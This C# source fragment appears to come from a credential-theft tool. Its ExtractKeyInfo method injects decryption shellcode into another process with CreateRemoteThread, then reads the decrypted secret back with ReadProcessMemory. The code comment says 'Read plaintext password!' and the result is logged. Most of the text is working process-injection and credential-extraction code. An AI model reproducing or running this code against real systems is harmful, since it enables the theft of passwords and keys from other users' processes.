public override string ToString()
{
return(ProcessName + "|" +
PID.ToString() + "|" +
UserName + "|" +
CPUTime + "|" +
NumBytes.ToString() + "|" +
HandleCount.ToString() + "|" +
ThreadCount.ToString() + "|" +
CommandLineArgs);
}
public static void ExtractKeyInfo(IUserKey key, IntPtr ProcessHandle, bool DecryptKeys)
{
if (!DecryptKeys)
{
Logger.WriteLine(key);
}
else
{
IntPtr EncryptedBlobAddr = Win32.AllocateRemoteBuffer(ProcessHandle, key.encryptedBlob);
byte[] Shellcode = GenerateDecryptionShellCode(EncryptedBlobAddr, key.encryptedBlob.Length);
// Execute the ShellCode
IntPtr ShellcodeAddr = Win32.AllocateRemoteBuffer(ProcessHandle, Shellcode);
IntPtr ThreadId = IntPtr.Zero;
IntPtr RemoteThreadHandle = Win32.CreateRemoteThread(ProcessHandle, IntPtr.Zero, 0, ShellcodeAddr, IntPtr.Zero, 0, out ThreadId);
if (RemoteThreadHandle == IntPtr.Zero)
{
Logger.WriteLine("Error: Could not create a thread for the shellcode");
return;
}
// Read plaintext password!
Thread.Sleep(1000);
IntPtr NumBytes;
byte[] plaintextBytes = new byte[key.encryptedBlob.Length];
int res = Win32.ReadProcessMemory(ProcessHandle, EncryptedBlobAddr, plaintextBytes, plaintextBytes.Length, out NumBytes);
if (res != 0 && NumBytes.ToInt64() == plaintextBytes.Length)
{
key.plaintextBlob = plaintextBytes;
Logger.WriteLine(key);
}
// Dunno why, but VirtualFree was causing crashes...
// Thread.Sleep(4000); // Wait for the shellcode to finish executing
// Win32.VirtualFreeEx(ProcessHandle, ShellcodeAddr, 0, Win32.FreeType.Release);
}
}